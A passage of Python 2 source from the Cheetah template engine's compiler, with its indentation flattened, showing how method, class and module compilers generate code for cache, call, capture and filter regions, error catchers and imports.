test = cacheInfo.get('test',None)
customID = cacheInfo.get('id',None)
if customID:
ID = customID
varyBy = cacheInfo.get('varyBy', repr(ID))
self._cacheRegionsStack.append(ID) # attrib of current methodCompiler
# @@TR: add this to a special class var as well
self.addChunk('')
self.addChunk('## START CACHE REGION: ID='+ID+
'. line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_RECACHE_%(ID)s = False'%locals())
self.addChunk('_cacheRegion_%(ID)s = self.getCacheRegion(regionID='%locals()
+ repr(ID)
+ ', cacheInfo=%r'%cacheInfo
+ ')')
self.addChunk('if _cacheRegion_%(ID)s.isNew():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('_cacheItem_%(ID)s = _cacheRegion_%(ID)s.getCacheItem('%locals()
+varyBy+')')
self.addChunk('if _cacheItem_%(ID)s.hasExpired():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
if test:
self.addChunk('if ' + test + ':')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('if (not _RECACHE_%(ID)s) and _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
#self.addChunk('print "DEBUG"+"-"*50')
self.addChunk('try:')
self.indent()
self.addChunk('_output = _cacheItem_%(ID)s.renderOutput()'%locals())
self.dedent()
self.addChunk('except KeyError:')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
#self.addChunk('print "DEBUG"+"*"*50')
self.dedent()
self.addChunk('else:')
self.indent()
self.addWriteChunk('_output')
self.addChunk('del _output')
self.dedent()
self.dedent()
self.addChunk('if _RECACHE_%(ID)s or not _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('trans = _cacheCollector_%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _cacheCollector_%(ID)s.response().write'%locals())
if interval:
self.addChunk(("_cacheItem_%(ID)s.setExpiryTime(currentTime() +"%locals())
+ str(interval) + ")")
def endCacheRegion(self):
ID = self._cacheRegionsStack.pop()
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('_cacheData = _cacheCollector_%(ID)s.response().getvalue()'%locals())
self.addChunk('_cacheItem_%(ID)s.setData(_cacheData)'%locals())
self.addWriteChunk('_cacheData')
self.addChunk('del _cacheData')
self.addChunk('del _cacheCollector_%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.dedent()
self.addChunk('## END CACHE REGION: '+ID)
self.addChunk('')
def nextCallRegionID(self):
return self.nextCacheID()
def startCallRegion(self, functionName, args, lineCol, regionTitle='CALL'):
class CallDetails: pass
callDetails = CallDetails()
callDetails.ID = ID = self.nextCallRegionID()
callDetails.functionName = functionName
callDetails.args = args
callDetails.lineCol = lineCol
callDetails.usesKeywordArgs = False
self._callRegionsStack.append((ID, callDetails)) # attrib of current methodCompiler
self.addChunk('## START %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def setCallArg(self, argName, lineCol):
ID, callDetails = self._callRegionsStack[-1]
if callDetails.usesKeywordArgs:
self._endCallArg()
else:
callDetails.usesKeywordArgs = True
self.addChunk('_callKws%(ID)s = {}'%locals())
self.addChunk('_currentCallArgname%(ID)s = %(argName)r'%locals())
callDetails.currentArgname = argName
def _endCallArg(self):
ID, callDetails = self._callRegionsStack[-1]
currCallArg = callDetails.currentArgname
self.addChunk(('_callKws%(ID)s[%(currCallArg)r] ='
' _callCollector%(ID)s.response().getvalue()')%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def endCallRegion(self, regionTitle='CALL'):
ID, callDetails = self._callRegionsStack[-1]
functionName, initialKwArgs, lineCol = (
callDetails.functionName, callDetails.args, callDetails.lineCol)
def reset(ID=ID):
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
if not callDetails.usesKeywordArgs:
reset()
self.addChunk('_callArgVal%(ID)s = _callCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
if initialKwArgs:
initialKwArgs = ', '+initialKwArgs
self.addFilteredChunk('%(functionName)s(_callArgVal%(ID)s%(initialKwArgs)s)'%locals())
self.addChunk('del _callArgVal%(ID)s'%locals())
else:
if initialKwArgs:
initialKwArgs = initialKwArgs+', '
self._endCallArg()
reset()
self.addFilteredChunk('%(functionName)s(%(initialKwArgs)s**_callKws%(ID)s)'%locals())
self.addChunk('del _callKws%(ID)s'%locals())
self.addChunk('## END %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('')
self._callRegionsStack.pop() # attrib of current methodCompiler
def nextCaptureRegionID(self):
return self.nextCacheID()
def startCaptureRegion(self, assignTo, lineCol):
class CaptureDetails: pass
captureDetails = CaptureDetails()
captureDetails.ID = ID = self.nextCaptureRegionID()
captureDetails.assignTo = assignTo
captureDetails.lineCol = lineCol
self._captureRegionsStack.append((ID,captureDetails)) # attrib of current methodCompiler
self.addChunk('## START CAPTURE REGION: '+ID
+' '+assignTo
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _captureCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _captureCollector%(ID)s.response().write'%locals())
def endCaptureRegion(self):
ID, captureDetails = self._captureRegionsStack.pop()
assignTo, lineCol = (captureDetails.assignTo, captureDetails.lineCol)
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('%(assignTo)s = _captureCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.addChunk('del _captureCollector%(ID)s'%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
def setErrorCatcher(self, errorCatcherName):
self.turnErrorCatcherOn()
self.addChunk('if self._CHEETAH__errorCatchers.has_key("' + errorCatcherName + '"):')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["' +
errorCatcherName + '"]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["'
+ errorCatcherName + '"] = ErrorCatchers.'
+ errorCatcherName + '(self)'
)
self.dedent()
def nextFilterRegionID(self):
return self.nextCacheID()
def setFilter(self, theFilter, isKlass):
class FilterDetails: pass
filterDetails = FilterDetails()
filterDetails.ID = ID = self.nextFilterRegionID()
filterDetails.theFilter = theFilter
filterDetails.isKlass = isKlass
self._filterRegionsStack.append((ID, filterDetails)) # attrib of current methodCompiler
self.addChunk('_orig_filter%(ID)s = _filter'%locals())
if isKlass:
self.addChunk('_filter = self._CHEETAH__currentFilter = ' + theFilter.strip() +
'(self).filter')
else:
if theFilter.lower() == 'none':
self.addChunk('_filter = self._CHEETAH__initialFilter')
else:
# is string representing the name of a builtin filter
self.addChunk('filterName = ' + repr(theFilter))
self.addChunk('if self._CHEETAH__filters.has_key("' + theFilter + '"):')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter'
+' = \\\n\t\t\tself._CHEETAH__filters[filterName] = '
+ 'getattr(self._CHEETAH__filtersLib, filterName)(self).filter')
self.dedent()
def closeFilterBlock(self):
ID, filterDetails = self._filterRegionsStack.pop()
#self.addChunk('_filter = self._CHEETAH__initialFilter')
self.addChunk('_filter = _orig_filter%(ID)s'%locals())
class AutoMethodCompiler(MethodCompiler):
def _setupState(self):
MethodCompiler._setupState(self)
self._argStringList = [ ("self",None) ]
self._streamingEnabled = True
def _useKWsDictArgForPassingTrans(self):
alreadyHasTransArg = [argname for argname,defval in self._argStringList
if argname=='trans']
return (self.methodName()!='respond'
and not alreadyHasTransArg
and self.setting('useKWsDictArgForPassingTrans'))
def cleanupState(self):
MethodCompiler.cleanupState(self)
self.commitStrConst()
if self._cacheRegionsStack:
self.endCacheRegion()
if self._callRegionsStack:
self.endCallRegion()
if self._streamingEnabled:
kwargsName = None
positionalArgsListName = None
for argname,defval in self._argStringList:
if argname.strip().startswith('**'):
kwargsName = argname.strip().replace('**','')
break
elif argname.strip().startswith('*'):
positionalArgsListName = argname.strip().replace('*','')
if not kwargsName and self._useKWsDictArgForPassingTrans():
kwargsName = 'KWS'
self.addMethArg('**KWS', None)
self._kwargsName = kwargsName
if not self._useKWsDictArgForPassingTrans():
if not kwargsName and not positionalArgsListName:
self.addMethArg('trans', 'None')
else:
self._streamingEnabled = False
self._indentLev = self.setting('initialMethIndentLevel')
mainBodyChunks = self._methodBodyChunks
self._methodBodyChunks = []
self._addAutoSetupCode()
self._methodBodyChunks.extend(mainBodyChunks)
self._addAutoCleanupCode()
def _addAutoSetupCode(self):
if self._initialMethodComment:
self.addChunk(self._initialMethodComment)
if self._streamingEnabled:
if self._useKWsDictArgForPassingTrans() and self._kwargsName:
self.addChunk('trans = %s.get("trans")'%self._kwargsName)
self.addChunk('if (not trans and not self._CHEETAH__isBuffering'
' and not callable(self.transaction)):')
self.indent()
self.addChunk('trans = self.transaction'
' # is None unless self.awake() was called')
self.dedent()
self.addChunk('if not trans:')
self.indent()
self.addChunk('trans = DummyTransaction()')
if self.setting('autoAssignDummyTransactionToSelf'):
self.addChunk('self.transaction = trans')
self.addChunk('_dummyTrans = True')
self.dedent()
self.addChunk('else: _dummyTrans = False')
else:
self.addChunk('trans = DummyTransaction()')
self.addChunk('_dummyTrans = True')
self.addChunk('write = trans.response().write')
if self.setting('useNameMapper'):
argNames = [arg[0] for arg in self._argStringList]
allowSearchListAsMethArg = self.setting('allowSearchListAsMethArg')
if allowSearchListAsMethArg and 'SL' in argNames:
pass
elif allowSearchListAsMethArg and 'searchList' in argNames:
self.addChunk('SL = searchList')
else:
self.addChunk('SL = self._CHEETAH__searchList')
if self.setting('useFilters'):
self.addChunk('_filter = self._CHEETAH__currentFilter')
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## START - generated method body')
self.addChunk('')
def _addAutoCleanupCode(self):
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## END - generated method body')
self.addChunk('')
if not self._isGenerator:
self.addStop()
self.addChunk('')
def addStop(self, expr=None):
self.addChunk('return _dummyTrans and trans.response().getvalue() or ""')
def addMethArg(self, name, defVal=None):
self._argStringList.append( (name,defVal) )
def methodSignature(self):
argStringChunks = []
for arg in self._argStringList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
argString = (', ').join(argStringChunks)
output = []
if self._decorator:
output.append(self._indent + self._decorator+'\n')
output.append(self._indent + "def "
+ self.methodName() + "(" +
argString + "):\n\n")
return ''.join(output)
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
class ClassCompiler(GenUtils):
methodCompilerClass = AutoMethodCompiler
methodCompilerClassForInit = MethodCompiler
def __init__(self, className, mainMethodName='respond',
moduleCompiler=None,
fileName=None,
settingsManager=None):
self._settingsManager = settingsManager
self._fileName = fileName
self._className = className
self._moduleCompiler = moduleCompiler
self._mainMethodName = mainMethodName
self._setupState()
methodCompiler = self._spawnMethodCompiler(
mainMethodName,
initialMethodComment='## CHEETAH: main method generated for this template')
self._setActiveMethodCompiler(methodCompiler)
if fileName and self.setting('monitorSrcFile'):
self._addSourceFileMonitoring(fileName)
def setting(self, key):
return self._settingsManager.setting(key)
def __getattr__(self, name):
"""Provide access to the methods and attributes of the MethodCompiler
at the top of the activeMethods stack: one-way namespace sharing
WARNING: Use .setMethods to assign the attributes of the MethodCompiler
from the methods of this class!!! or you will be assigning to attributes
of this object instead."""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeMethodsList and hasattr(self._activeMethodsList[-1], name):
return getattr(self._activeMethodsList[-1], name)
else:
raise AttributeError, name
def _setupState(self):
self._classDef = None
self._decoratorForNextMethod = None
self._activeMethodsList = [] # stack while parsing/generating
self._finishedMethodsList = [] # store by order
self._methodsIndex = {} # store by name
self._baseClass = 'Template'
self._classDocStringLines = []
# printed after methods in the gen class def:
self._generatedAttribs = ['_CHEETAH__instanceInitialized = False']
self._generatedAttribs.append('_CHEETAH_version = __CHEETAH_version__')
self._generatedAttribs.append(
'_CHEETAH_versionTuple = __CHEETAH_versionTuple__')
self._generatedAttribs.append('_CHEETAH_genTime = __CHEETAH_genTime__')
self._generatedAttribs.append('_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__')
self._generatedAttribs.append('_CHEETAH_src = __CHEETAH_src__')
self._generatedAttribs.append(
'_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__')
if self.setting('templateMetaclass'):
self._generatedAttribs.append('__metaclass__ = '+self.setting('templateMetaclass'))
self._initMethChunks = []
self._blockMetaData = {}
self._errorCatcherCount = 0
self._placeholderToErrorCatcherMap = {}
def cleanupState(self):
while self._activeMethodsList:
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
self._setupInitMethod()
if self._mainMethodName == 'respond':
if self.setting('setup__str__method'):
self._generatedAttribs.append('def __str__(self): return self.respond()')
self.addAttribute('_mainCheetahMethod_for_' + self._className +
'= ' + repr(self._mainMethodName) )
def _setupInitMethod(self):
__init__ = self._spawnMethodCompiler('__init__',
klass=self.methodCompilerClassForInit)
__init__.setMethodSignature("def __init__(self, *args, **KWs)")
__init__.addChunk("%s.__init__(self, *args, **KWs)" % self._baseClass)
__init__.addChunk(_initMethod_initCheetah%{'className':self._className})
for chunk in self._initMethChunks:
__init__.addChunk(chunk)
__init__.cleanupState()
self._swallowMethodCompiler(__init__, pos=0)
def _addSourceFileMonitoring(self, fileName):
# @@TR: this stuff needs auditing for Cheetah 2.0
# the first bit is added to init
self.addChunkToInit('self._filePath = ' + repr(fileName))
self.addChunkToInit('self._fileMtime = ' + str(getmtime(fileName)) )
# the rest is added to the main output method of the class ('mainMethod')
self.addChunk('if exists(self._filePath) and ' +
'getmtime(self._filePath) > self._fileMtime:')
self.indent()
self.addChunk('self._compile(file=self._filePath, moduleName='+className + ')')
self.addChunk(
'write(getattr(self, self._mainCheetahMethod_for_' + self._className +
')(trans=trans))')
self.addStop()
self.dedent()
def setClassName(self, name):
self._className = name
def className(self):
return self._className
def setBaseClass(self, baseClassName):
self._baseClass = baseClassName
def setMainMethodName(self, methodName):
if methodName == self._mainMethodName:
return
## change the name in the methodCompiler and add new reference
mainMethod = self._methodsIndex[self._mainMethodName]
mainMethod.setMethodName(methodName)
self._methodsIndex[methodName] = mainMethod
## make sure that fileUpdate code still works properly:
chunkToChange = ('write(self.' + self._mainMethodName + '(trans=trans))')
chunks = mainMethod._methodBodyChunks
if chunkToChange in chunks:
for i in range(len(chunks)):
if chunks[i] == chunkToChange:
chunks[i] = ('write(self.' + methodName + '(trans=trans))')
## get rid of the old reference and update self._mainMethodName
del self._methodsIndex[self._mainMethodName]
self._mainMethodName = methodName
def setMainMethodArgs(self, argsList):
mainMethodCompiler = self._methodsIndex[self._mainMethodName]
for argName, defVal in argsList:
mainMethodCompiler.addMethArg(argName, defVal)
def _spawnMethodCompiler(self, methodName, klass=None,
initialMethodComment=None):
if klass is None:
klass = self.methodCompilerClass
decorator = None
if self._decoratorForNextMethod:
decorator = self._decoratorForNextMethod
self._decoratorForNextMethod = None
methodCompiler = klass(methodName, classCompiler=self,
decorator=decorator,
initialMethodComment=initialMethodComment)
self._methodsIndex[methodName] = methodCompiler
return methodCompiler
def _setActiveMethodCompiler(self, methodCompiler):
self._activeMethodsList.append(methodCompiler)
def _getActiveMethodCompiler(self):
return self._activeMethodsList[-1]
def _popActiveMethodCompiler(self):
return self._activeMethodsList.pop()
def _swallowMethodCompiler(self, methodCompiler, pos=None):
methodCompiler.cleanupState()
if pos==None:
self._finishedMethodsList.append( methodCompiler )
else:
self._finishedMethodsList.insert(pos, methodCompiler)
return methodCompiler
def startMethodDef(self, methodName, argsList, parserComment):
methodCompiler = self._spawnMethodCompiler(
methodName, initialMethodComment=parserComment)
self._setActiveMethodCompiler(methodCompiler)
for argName, defVal in argsList:
methodCompiler.addMethArg(argName, defVal)
def _finishedMethods(self):
return self._finishedMethodsList
def addDecorator(self, decoratorExpr):
"""Set the decorator to be used with the next method in the source.
See _spawnMethodCompiler() and MethodCompiler for the details of how
this is used.
"""
self._decoratorForNextMethod = decoratorExpr
def addClassDocString(self, line):
self._classDocStringLines.append( line.replace('%','%%'))
def addChunkToInit(self,chunk):
self._initMethChunks.append(chunk)
def addAttribute(self, attribExpr):
## first test to make sure that the user hasn't used any fancy Cheetah syntax
# (placeholders, directives, etc.) inside the expression
if attribExpr.find('VFN(') != -1 or attribExpr.find('VFFSL(') != -1:
raise ParseError(self,
'Invalid #attr directive.' +
' It should only contain simple Python literals.')
## now add the attribute
self._generatedAttribs.append(attribExpr)
def addErrorCatcherCall(self, codeChunk, rawCode='', lineCol=''):
if self._placeholderToErrorCatcherMap.has_key(rawCode):
methodName = self._placeholderToErrorCatcherMap[rawCode]
if not self.setting('outputRowColComments'):
self._methodsIndex[methodName].addMethDocString(
'plus at line %s, col %s'%lineCol)
return methodName
self._errorCatcherCount += 1
methodName = '__errorCatcher' + str(self._errorCatcherCount)
self._placeholderToErrorCatcherMap[rawCode] = methodName
catcherMeth = self._spawnMethodCompiler(
methodName,
klass=MethodCompiler,
initialMethodComment=('## CHEETAH: Generated from ' + rawCode +
' at line %s, col %s'%lineCol + '.')
)
catcherMeth.setMethodSignature('def ' + methodName +
'(self, localsDict={})')
# is this use of localsDict right?
catcherMeth.addChunk('try:')
catcherMeth.indent()
catcherMeth.addChunk("return eval('''" + codeChunk +
"''', globals(), localsDict)")
catcherMeth.dedent()
catcherMeth.addChunk('except self._CHEETAH__errorCatcher.exceptions(), e:')
catcherMeth.indent()
catcherMeth.addChunk("return self._CHEETAH__errorCatcher.warn(exc_val=e, code= " +
repr(codeChunk) + " , rawCode= " +
repr(rawCode) + " , lineCol=" + str(lineCol) +")")
catcherMeth.cleanupState()
self._swallowMethodCompiler(catcherMeth)
return methodName
def closeDef(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
def closeBlock(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
methodName = methCompiler.methodName()
if self.setting('includeBlockMarkers'):
endMarker = self.setting('blockMarkerEnd')
methCompiler.addStrConst(endMarker[0] + methodName + endMarker[1])
self._swallowMethodCompiler(methCompiler)
#metaData = self._blockMetaData[methodName]
#rawDirective = metaData['raw']
#lineCol = metaData['lineCol']
## insert the code to call the block, caching if #cache directive is on
codeChunk = 'self.' + methodName + '(trans=trans)'
self.addChunk(codeChunk)
#self.appendToPrevChunk(' # generated from ' + repr(rawDirective) )
#if self.setting('outputRowColComments'):
# self.appendToPrevChunk(' at line %s, col %s' % lineCol + '.')
## code wrapping methods
def classDef(self):
if self._classDef:
return self._classDef
else:
return self.wrapClassDef()
__str__ = classDef
def wrapClassDef(self):
ind = self.setting('indentationStep')
classDefChunks = [self.classSignature(),
self.classDocstring(),
]
def addMethods():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED METHODS',
'\n',
self.methodDefs(),
])
def addAttributes():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED ATTRIBUTES',
'\n',
self.attributes(),
])
if self.setting('outputMethodsBeforeAttributes'):
addMethods()
addAttributes()
else:
addAttributes()
addMethods()
classDef = '\n'.join(classDefChunks)
self._classDef = classDef
return classDef
def classSignature(self):
return "class %s(%s):" % (self.className(), self._baseClass)
def classDocstring(self):
if not self._classDocStringLines:
return ''
ind = self.setting('indentationStep')
docStr = ('%(ind)s"""\n%(ind)s' +
'\n%(ind)s'.join(self._classDocStringLines) +
'\n%(ind)s"""\n'
) % {'ind':ind}
return docStr
def methodDefs(self):
methodDefs = [str(methGen) for methGen in self._finishedMethods() ]
return '\n\n'.join(methodDefs)
def attributes(self):
attribs = [self.setting('indentationStep') + str(attrib)
for attrib in self._generatedAttribs ]
return '\n\n'.join(attribs)
class AutoClassCompiler(ClassCompiler):
pass
##################################################
## MODULE COMPILERS
class ModuleCompiler(SettingsManager, GenUtils):
parserClass = Parser
classCompilerClass = AutoClassCompiler
def __init__(self, source=None, file=None,
moduleName='DynamicallyCompiledCheetahTemplate',
mainClassName=None, # string
mainMethodName=None, # string
baseclassName=None, # string
extraImportStatements=None, # list of strings
settings=None # dict
):
SettingsManager.__init__(self)
if settings:
self.updateSettings(settings)
# disable useStackFrames if the C version of NameMapper isn't compiled
# it's painfully slow in the Python version and bites Windows users all
# the time:
if not NameMapper.C_VERSION:
if not sys.platform.startswith('java'):
warnings.warn(
"\nYou don't have the C version of NameMapper installed! "
"I'm disabling Cheetah's useStackFrames option as it is "
"painfully slow with the Python version of NameMapper. "
"You should get a copy of Cheetah with the compiled C version of NameMapper."
)
self.setSetting('useStackFrames', False)
self._compiled = False
self._moduleName = moduleName
if not mainClassName:
self._mainClassName = moduleName
else:
self._mainClassName = mainClassName
self._mainMethodNameArg = mainMethodName
if mainMethodName:
self.setSetting('mainMethodName', mainMethodName)
self._baseclassName = baseclassName
self._filePath = None
self._fileMtime = None
if source and file:
raise TypeError("Cannot compile from a source string AND file.")
elif isinstance(file, types.StringType) or isinstance(file, types.UnicodeType): # it's a filename.
f = open(file) # Raises IOError.
source = f.read()
f.close()
self._filePath = file
self._fileMtime = os.path.getmtime(file)
elif hasattr(file, 'read'):
source = file.read() # Can't set filename or mtime--they're not accessible.
elif file:
raise TypeError("'file' argument must be a filename string or file-like object")
if self._filePath:
self._fileDirName, self._fileBaseName = os.path.split(self._filePath)
self._fileBaseNameRoot, self._fileBaseNameExt = \
os.path.splitext(self._fileBaseName)
if not (isinstance(source, str) or isinstance(source, unicode)):
source = str( source )
# by converting to string here we allow objects such as other Templates
# to be passed in
# Handle the #indent directive by converting it to other directives.
# (Over the long term we'll make it a real directive.)
if source == "":
warnings.warn("You supplied an empty string for the source!", )
if source.find('#indent') != -1: #@@TR: undocumented hack
source = indentize(source)
self._parser = self.parserClass(source, filename=self._filePath, compiler=self)
self._setupCompilerState()
def __getattr__(self, name):
"""Provide one-way access to the methods and attributes of the
ClassCompiler, and thereby the MethodCompilers as well.
WARNING: Use .setMethods to assign the attributes of the ClassCompiler
from the methods of this class!!! or you will be assigning to attributes
of this object instead.
"""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeClassesList and hasattr(self._activeClassesList[-1], name):
return getattr(self._activeClassesList[-1], name)
else:
raise AttributeError, name
def _initializeSettings(self):
self.updateSettings(copy.deepcopy(DEFAULT_COMPILER_SETTINGS))
def _setupCompilerState(self):
self._activeClassesList = []
self._finishedClassesList = [] # listed by ordered
self._finishedClassIndex = {} # listed by name
self._moduleDef = None
self._moduleShBang = '#!/usr/bin/env python'
self._moduleEncoding = 'ascii'
self._moduleEncodingStr = ''
self._moduleHeaderLines = []
self._moduleDocStringLines = []
self._specialVars = {}
self._importStatements = [
"import sys",
"import os",
"import os.path",
"from os.path import getmtime, exists",
"import time",
"import types",
"import __builtin__",
"from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion",
"from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple",
"from Cheetah.Template import Template",
"from Cheetah.DummyTransaction import DummyTransaction",
"from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList",
"from Cheetah.CacheRegion import CacheRegion",
"import Cheetah.Filters as Filters",
"import Cheetah.ErrorCatchers as ErrorCatchers",
]
self._importedVarNames = ['sys',
'os',
'os.path',
'time',
'types',
'Template',
'DummyTransaction',
'NotFound',
'Filters',
'ErrorCatchers',
'CacheRegion',
]
self._moduleConstants = [
"try:",
" True, False",
"except NameError:",
" True, False = (1==1), (1==0)",
"VFFSL=valueFromFrameOrSearchList",
"VFSL=valueFromSearchList",
"VFN=valueForName",
"currentTime=time.time",
]
def compile(self):
classCompiler = self._spawnClassCompiler(self._mainClassName)
if self._baseclassName:
classCompiler.setBaseClass(self._baseclassName)
self._addActiveClassCompiler(classCompiler)
self._parser.parse()
self._swallowClassCompiler(self._popActiveClassCompiler())
self._compiled = True
self._parser.cleanup()
def _spawnClassCompiler(self, className, klass=None):
if klass is None:
klass = self.classCompilerClass
classCompiler = klass(className,
moduleCompiler=self,
mainMethodName=self.setting('mainMethodName'),
fileName=self._filePath,
settingsManager=self,
)
return classCompiler
def _addActiveClassCompiler(self, classCompiler):
self._activeClassesList.append(classCompiler)
def _getActiveClassCompiler(self):
return self._activeClassesList[-1]
def _popActiveClassCompiler(self):
return self._activeClassesList.pop()
def _swallowClassCompiler(self, classCompiler):
classCompiler.cleanupState()
self._finishedClassesList.append( classCompiler )
self._finishedClassIndex[classCompiler.className()] = classCompiler
return classCompiler
def _finishedClasses(self):
return self._finishedClassesList
def importedVarNames(self):
return self._importedVarNames
def addImportedVarNames(self, varNames):
self._importedVarNames.extend(varNames)
## methods for adding stuff to the module and class definitions
def setBaseClass(self, baseClassName):
if self._mainMethodNameArg:
self.setMainMethodName(self._mainMethodNameArg)
else:
self.setMainMethodName(self.setting('mainMethodNameForSubclasses'))
if self.setting('handlerForExtendsDirective'):
handler = self.setting('handlerForExtendsDirective')
baseClassName = handler(compiler=self, baseClassName=baseClassName)
self._getActiveClassCompiler().setBaseClass(baseClassName)
elif (not self.setting('autoImportForExtendsDirective')
or baseClassName=='object' or baseClassName in self.importedVarNames()):
self._getActiveClassCompiler().setBaseClass(baseClassName)
# no need to import
else:
##################################################
## If the #extends directive contains a classname or modulename that isn't
# in self.importedVarNames() already, we assume that we need to add
# an implied 'from ModName import ClassName' where ModName == ClassName.
# - This is the case in WebKit servlet modules.
# - We also assume that the final . separates the classname from the
# module name. This might break if people do something really fancy
# with their dots and namespaces.
chunks = baseClassName.split('.')
if len(chunks)==1:
self._getActiveClassCompiler().setBaseClass(baseClassName)
if baseClassName not in self.importedVarNames():
modName = baseClassName
# we assume the class name to be the module name
# and that it's not a builtin:
importStatement = "from %s import %s" % (modName, baseClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [baseClassName,] )
else:
needToAddImport = True
modName = chunks[0]
#print chunks, ':', self.importedVarNames()
for chunk in chunks[1:-1]:
if modName in self.importedVarNames():
needToAddImport = False
finalBaseClassName = baseClassName.replace(modName+'.', '')
self._getActiveClassCompiler().setBaseClass(finalBaseClassName)
break
else:
modName += '.'+chunk
if needToAddImport:
modName, finalClassName = '.'.join(chunks[:-1]), chunks[-1]
#if finalClassName != chunks[:-1][-1]:
if finalClassName != chunks[-2]:
# we assume the class name to be the module name
modName = '.'.join(chunks)
self._getActiveClassCompiler().setBaseClass(finalClassName)
importStatement = "from %s import %s" % (modName, finalClassName)
self.addImportStatement(importStatement)
self.addImportedVarNames( [finalClassName,] )
def setCompilerSetting(self, key, valueExpr):
self.setSetting(key, eval(valueExpr) )
self._parser.configureParser()
def setCompilerSettings(self, keywords, settingsStr):
KWs = keywords
merge = True
if 'nomerge' in KWs:
merge = False
if 'reset' in KWs:
# @@TR: this is actually caught by the parser at the moment.
# subject to change in the future
self._initializeSettings()
self._parser.configureParser()
return
elif 'python' in KWs:
settingsReader = self.updateSettingsFromPySrcStr
# this comes from SettingsManager
else:
# this comes from SettingsManager
settingsReader = self.updateSettingsFromConfigStr
settingsReader(settingsStr)
self._parser.configureParser()
def setShBang(self, shBang):
self._moduleShBang = shBang
def setModuleEncoding(self, encoding):
self._moduleEncoding = encoding
self._moduleEncodingStr = '# -*- coding: %s -*-' %encoding
def getModuleEncoding(self):
return self._moduleEncoding
def addModuleHeader(self, line):
"""Adds a header comment to the top of the generated module.
"""
self._moduleHeaderLines.append(line)
def addModuleDocString(self, line):
"""Adds a line to the generated module docstring.
"""
self._moduleDocStringLines.append(line)
def addModuleGlobal(self, line):
"""Adds a line of global module code. It is inserted after the import
statements and Cheetah default module constants.
"""
self._moduleConstants.append(line)
def addSpecialVar(self, basename, contents, includeUnderscores=True):
"""Adds module __specialConstant__ to the module globals.
"""
name = includeUnderscores and '__'+basename+'__' or basename
self._specialVars[name] = contents.strip()
def addImportStatement(self, impStatement):
self._importStatements.append(impStatement)
#@@TR 2005-01-01: there's almost certainly a cleaner way to do this!
